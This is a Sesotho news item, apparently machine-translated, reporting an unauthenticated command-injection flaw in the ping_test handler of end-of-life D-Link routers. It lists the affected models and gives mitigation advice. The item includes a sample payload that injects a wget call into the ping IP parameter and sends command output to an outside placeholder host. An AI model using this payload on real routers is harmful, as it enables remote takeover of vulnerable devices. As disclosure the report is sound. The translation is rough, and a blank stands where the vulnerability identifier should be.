Ho li-routers tsa D-Link tse se nang mohala ho ba kotsing e kotsi (), e leng se u lumellang hore u phethe khoutu ka thōko ho lehlakoreng la sesebelisoa ka ho romela kopo e khethehileng ho "ping_test" handler, e fumanehang ntle le ho netefatsa.
Hoa thahasellisa hore ho ea ka baetsi ba firmware, mohala oa "ping_test" o lokela ho etsoa feela ka mor'a ho netefatsa, empa ha e le hantle o bitsoa leha e le efe, ho sa tsotellehe ho kena ka har'a marang-rang. Haholo-holo, ha u fihlella sengoloa sa apply_sec.cgi le ho fetisa parameter ea "action=ping_test", script e lebisa leqepheng la netefatso, empa ka nako e ts'oanang e etsa ketso e amanang le ping_test. Ho phethahatsa khoutu, ho ile ha sebelisoa ts'oaetso e 'ngoe ho ping_test ka boeona, e bitsang ts'ebeliso ea ping ntle le ho hlahloba ka nepo ho nepahala ha aterese ea IP e rometsoeng ho hlahlojoa. Mohlala, ho letsetsa ts'ebeliso ea wget le ho fetisetsa liphetho tsa taelo ea "echo 1234" ho moamoheli oa kantle, bolela feela paramethara "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ho ba teng ha ts'oaetso ho netefalitsoe ka molao mefuteng e latelang:
- DIR-655 e nang le firmware 3.02b05 kapa ho feta;
- DIR-866L e nang le firmware 1.03b04 kapa ho feta;
- DIR-1565 e nang le firmware 1.01 kapa ho feta;
- DIR-652 (ha ho na tlhahisoleseling mabapi le mefuta e thata ea firmware e fanoeng)
Nako ea ts'ehetso ea mehlala ena e se e felile, kahoo D-Link , e ke keng ea lokolla lintlafatso bakeng sa bona ho felisa ts'oaetso, ha e khothaletse ho e sebelisa mme e eletsa ho e nkela sebaka ka lisebelisoa tse ncha. Joalo ka ts'ebetso ea ts'ireletso, o ka fokotsa phihlello ea sehokelo sa marang-rang ho liaterese tse tšepahalang tsa IP feela.
Hamorao ho ile ha sibolloa hore bofokoli le bona bo ne bo le teng mefuta ea DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 le DIR-825, merero ea ho lokolla lisebelisoa tse e-s'o tsejoe.
Source: opennet.ru